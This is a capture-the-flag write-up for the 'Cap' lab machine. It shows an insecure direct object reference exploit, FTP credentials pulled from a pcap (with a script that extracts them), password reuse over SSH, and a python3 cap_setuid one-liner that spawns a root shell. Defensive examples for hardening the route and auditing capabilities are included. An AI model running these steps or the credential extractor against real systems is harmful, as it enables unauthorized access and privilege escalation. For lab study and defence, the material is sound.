# Cap

OS: Linux

Difficulty: Easy

## Port Scanning

```
PORT   STATE SERVICE REASON  VERSION
21/tcp open  ftp     syn-ack vsftpd 3.0.3
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack gunicorn
```

#### Checking out the website

![](https://user-images.githubusercontent.com/53917092/120903619-8acd6580-c61d-11eb-87c0-3faeb9725699.png)

Now we know that this site is used for network monitoring and that there is a user named Nathan.

Checking out "Security Snapshot"

![](https://user-images.githubusercontent.com/53917092/120903720-2b238a00-c61e-11eb-8ac9-de3df3a134dc.png)

This option redirects us to /data/1, a snapshot with no captured traffic. The snapshot id is a plain sequential number in the URL and the application does not check who the snapshot belongs to (an insecure direct object reference), so I changed it to /data/0 and there we see some recorded traffic.

![](https://user-images.githubusercontent.com/53917092/120903730-3c6c9680-c61e-11eb-876e-d2e75b072f81.png)

I clicked download and got a file called 0.pcap, which I opened in Wireshark.
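The pattern behind the /data/1 to /data/0 trick, as an added example that is not the box's app.py (the page only tells us the site runs under gunicorn and never shows the application code): a minimal WSGI app with the vulnerable route beside a hardened one. The capture store, the owners, and the `app.session_user` environ key are made up for the demonstration.

```python
"""Insecure direct object reference on /data/<id>, and a hardened version.

Added example for this write-up, not the box's own app.py. The vulnerable
route serves whatever id is in the URL, which is why /data/0 returned a
capture the logged-in user never made; the hardened route only serves
captures owned by the session user.
"""
import json
import re

# Constructed capture store (owners are made up): capture id -> metadata.
CAPTURES = {
    0: {"owner": "nathan", "file": "0.pcap", "packets": 72},
    1: {"owner": "guest", "file": "1.pcap", "packets": 0},
}
ROUTE = re.compile(r"^/data/(\d+)$")


def _respond(start_response, status, body):
    start_response(status, [("Content-Type", "application/json")])
    return [json.dumps(body).encode()]


def vulnerable_app(environ, start_response):
    """Trusts the id in the path: any logged-in user can walk 0, 1, 2, ..."""
    m = ROUTE.match(environ.get("PATH_INFO", ""))
    if not m or int(m.group(1)) not in CAPTURES:
        return _respond(start_response, "404 Not Found", {"error": "not found"})
    return _respond(start_response, "200 OK", CAPTURES[int(m.group(1))])


def hardened_app(environ, start_response):
    """Same route, but the record must belong to the session user.
    'not yours' and 'does not exist' both answer 404, so probing ids
    reveals nothing about other users' captures."""
    user = environ.get("app.session_user")  # hypothetical key set by auth middleware
    m = ROUTE.match(environ.get("PATH_INFO", ""))
    capture = CAPTURES.get(int(m.group(1))) if m else None
    if user is None or capture is None or capture["owner"] != user:
        return _respond(start_response, "404 Not Found", {"error": "not found"})
    return _respond(start_response, "200 OK", capture)


def get(app, path, user=None):
    """Drive a WSGI app in-process without a server; returns (status, parsed body)."""
    statuses = []
    environ = {"REQUEST_METHOD": "GET", "PATH_INFO": path, "app.session_user": user}
    body = b"".join(app(environ, lambda status, headers: statuses.append(status)))
    return statuses[0], json.loads(body)


if __name__ == "__main__":
    # The write-up's move: logged in as one user, ask for /data/0 instead of /data/1.
    print("vulnerable /data/0 as guest :", get(vulnerable_app, "/data/0", "guest"))
    print("hardened   /data/0 as guest :", get(hardened_app, "/data/0", "guest"))
    print("hardened   /data/0 as nathan:", get(hardened_app, "/data/0", "nathan"))
```

The fix is the ownership check, not hiding the id: a random, unguessable handle alone would still be an IDOR if the server never verified who the handle belongs to.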

## User

![](https://user-images.githubusercontent.com/53917092/120903766-72aa1600-c61e-11eb-9f7a-8b7091209832.png)

This file contains a lot of useful information. We see the user's HTTP requests to the site and some plain TCP traffic, but the main thing is an FTP session: FTP sends its USER and PASS commands in cleartext over the control channel (port 21), so Nathan's username and password for the FTP server are sitting in the capture.

Sorting the packets by protocol (or applying the display filter `ftp`) and navigating to the end of the file, we find this information.

![](https://user-images.githubusercontent.com/53917092/120903978-d4b74b00-c61f-11eb-9156-488ad5edc8d3.png)

user: nathan

password: Buck3tH4TF0RM3!
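What Wireshark is showing in the screenshots, as an added example that is not part of the original write-up: a standard-library-only parser that pulls FTP USER/PASS commands out of a classic pcap. The capture it runs on is constructed in memory (the client and server addresses are made up; the credentials are the ones recovered from 0.pcap), so it runs offline.

```python
"""Extract FTP logins from a pcap file.

Added example for this write-up, not code from the original post. It builds a
small constructed capture (Ethernet/IPv4/TCP frames carrying the FTP login seen
in 0.pcap) and parses it with the standard library only. The point is the one
the screenshots make: FTP authentication travels in cleartext.
"""
import socket
import struct

FTP_PORT = 21


def _ipv4_tcp_frame(src_ip, dst_ip, sport, dport, seq, payload):
    """One Ethernet/IPv4/TCP frame (checksums left zero; the parser ignores them)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip)) + tcp
    eth = b"\x00\x11\x22\x33\x44\x55" + b"\x66\x77\x88\x99\xaa\xbb" + b"\x08\x00"
    return eth + ip


def build_sample_pcap():
    """Constructed pcap: a client logging in to an FTP server. IPs are made up."""
    client, server = "192.168.196.1", "192.168.196.16"
    commands = [b"USER nathan\r\n", b"PASS Buck3tH4TF0RM3!\r\n", b"SYST\r\n"]
    # libpcap global header: magic, version 2.4, thiszone, sigfigs, snaplen, linktype 1 (Ethernet)
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    seq = 1000
    for i, cmd in enumerate(commands):
        frame = _ipv4_tcp_frame(client, server, 54321, FTP_PORT, seq, cmd)
        out += struct.pack("<IIII", 1622733000 + i, 0, len(frame), len(frame)) + frame
        seq += len(cmd)
    return out


def extract_ftp_credentials(pcap_bytes):
    """Return [(server_ip, user, password), ...] for every FTP login in the capture."""
    magic = pcap_bytes[:4]
    if magic in (b"\xd4\xc3\xb2\xa1", b"\x4d\x3c\xb2\xa1"):      # little-endian (us / ns)
        endian = "<"
    elif magic in (b"\xa1\xb2\xc3\xd4", b"\xa1\xb2\x3c\x4d"):    # big-endian (us / ns)
        endian = ">"
    else:
        raise ValueError("not a classic pcap file (pcapng is not handled here)")
    if struct.unpack(endian + "I", pcap_bytes[20:24])[0] != 1:
        raise ValueError("only Ethernet (linktype 1) captures are handled")

    creds, pending_user = [], {}   # pending_user: TCP flow -> USER seen, waiting for PASS
    offset = 24
    while offset + 16 <= len(pcap_bytes):
        _, _, incl_len, _ = struct.unpack(endian + "IIII", pcap_bytes[offset:offset + 16])
        offset += 16
        pkt = pcap_bytes[offset:offset + incl_len]
        offset += incl_len
        if len(pkt) < 34 or pkt[12:14] != b"\x08\x00":
            continue                                   # not IPv4
        ip = pkt[14:]
        ihl = (ip[0] & 0x0F) * 4
        total_len = struct.unpack("!H", ip[2:4])[0]
        if ip[9] != 6:
            continue                                   # not TCP
        src_ip, dst_ip = socket.inet_ntoa(ip[12:16]), socket.inet_ntoa(ip[16:20])
        tcp = ip[ihl:total_len]
        if len(tcp) < 20:
            continue
        sport, dport = struct.unpack("!HH", tcp[:4])
        payload = tcp[(tcp[12] >> 4) * 4:]
        if dport != FTP_PORT or not payload:
            continue                                   # only client -> server control commands
        flow = (src_ip, sport, dst_ip, dport)
        # Interactive clients send one command per segment, so no stream reassembly here.
        for line in payload.split(b"\r\n"):
            verb, _, arg = line.partition(b" ")
            if verb.upper() == b"USER":
                pending_user[flow] = arg.decode(errors="replace")
            elif verb.upper() == b"PASS" and flow in pending_user:
                creds.append((dst_ip, pending_user.pop(flow), arg.decode(errors="replace")))
    return creds


if __name__ == "__main__":
    for server, user, password in extract_ftp_credentials(build_sample_pcap()):
        print(f"{server}: {user} / {password}")
```

Feed it a real file with `extract_ftp_credentials(open("0.pcap", "rb").read())`; in Wireshark the display filter `ftp.request.command == "PASS"` lands on the same packet.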

![](https://user-images.githubusercontent.com/53917092/120904027-3081d400-c620-11eb-98aa-a3050f5c64c8.png)

Logging in to the FTP server with these credentials, we can download the user flag by running

> get user.txt

The same password is reused for SSH, so we can also log in there.

> ssh nathan@\<box\_ip>

> password: Buck3tH4TF0RM3!

## Privesc

After some basic enumeration I saw that /var/www/html/app.py contains the line `os.setuid(1000)`. A process can only call setuid() if it is root or holds the cap_setuid capability, which led me to enumerate the binaries with file capabilities, looking for anything that can change its own uid to 0 (root).

> getcap -r / 2>/dev/null

```
nathan@cap:~$ getcap -r / 2>/dev/null
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
```

The interpreter has cap_setuid in its effective set (the `e` in `+eip`), so any code it runs may call setuid(0) and become root, with no SUID bit or password involved. We can make a one-liner that changes its uid and spawns a shell as root.

> python3 -c 'import os;os.setuid(0);os.system("bash")'

![](https://user-images.githubusercontent.com/53917092/120905497-c588cb00-c628-11eb-844a-11d9761b9458.png)
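A quick audit of the getcap output above, as an added example that is not a tool from the original post: it parses `getcap -r /` output in both the older `path = caps` and the newer `path caps` layouts and flags binaries whose effective set carries a capability that an unprivileged user can turn into root. Which capabilities count as dangerous, and which paths count as interpreters, are this example's own judgement, not something the page states.

```python
"""Flag file capabilities that hand out root-equivalent power.

Added example for this write-up. Input is the text of `getcap -r / 2>/dev/null`;
the constructed sample below is the output recorded on the box.
"""
import re

SAMPLE_GETCAP = """\
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
"""

# Judgement call for this example: capabilities that give root outright or let the
# holder bypass file permissions / read any process. cap_setuid is the one used here.
DANGEROUS = {
    "cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
    "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_chown", "cap_fowner",
}
# Interpreters and shells run whatever the caller types, so any capability on them matters.
INTERPRETERS = re.compile(r"/(python[\d.]*|perl[\d.]*|ruby[\d.]*|node|php[\d.]*|bash|dash|sh|zsh)$")
# One clause of cap_to_text output: "cap_a,cap_b+eip" or "cap_a=ep".
CLAUSE = re.compile(r"^(?P<caps>[\w,]+)(?P<op>[+=])(?P<flags>[eip]+)$")


def parse_getcap(text):
    """Return {path: {capability: set of flags}}; flags are e (effective),
    i (inheritable), p (permitted). Clauses that remove flags ('-') are skipped."""
    result = {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if " = " in line:                     # older libcap: "path = caps"
            path, caps_text = line.split(" = ", 1)
        else:                                 # newer libcap: "path caps"
            path, _, caps_text = line.partition(" ")
        caps = result.setdefault(path, {})
        for clause in caps_text.split():
            m = CLAUSE.match(clause)
            if not m:
                continue
            for cap in m.group("caps").split(","):
                caps.setdefault(cap, set()).update(m.group("flags"))
    return result


def audit(text):
    """Return [(path, [reasons])] for binaries worth a second look."""
    findings = []
    for path, caps in parse_getcap(text).items():
        effective = {cap for cap, flags in caps.items() if "e" in flags}
        reasons = [f"{cap} is effective" for cap in sorted(effective & DANGEROUS)]
        if effective and INTERPRETERS.search(path):
            reasons.append("interpreter/shell with capabilities: runs arbitrary code")
        if reasons:
            findings.append((path, reasons))
    return findings


if __name__ == "__main__":
    for path, reasons in audit(SAMPLE_GETCAP):
        print(path)
        for reason in reasons:
            print("   ", reason)
```

On this box it reports only /usr/bin/python3.8, once for cap_setuid and once for being an interpreter; cap_net_raw on ping and the traceroute tools is the stock Ubuntu configuration and is left alone. On a live system pipe the real output in: `audit(subprocess.run(["getcap", "-r", "/"], capture_output=True, text=True).stdout)`.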

## Helpful links

### Web

* [portswigger](https://portswigger.net/web-security/access-control/idor)
* [geeksforgeeks](https://www.geeksforgeeks.org/insecure-direct-object-reference-idor-vulnerability/)
* [owasp](https://cheatsheetseries.owasp.org/cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html)
* [hacktricks](https://book.hacktricks.xyz/pentesting-web/idor)

### User

* [hacktricks - wireshark](https://book.hacktricks.xyz/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks)
* [hacktricks - pentesting FTP](https://book.hacktricks.xyz/pentesting/pentesting-ftp)

### Privesc

* [hacktricks - linux privesc](https://book.hacktricks.xyz/linux-unix/privilege-escalation)
* [GTFOBins - python](https://gtfobins.github.io/gtfobins/python/)

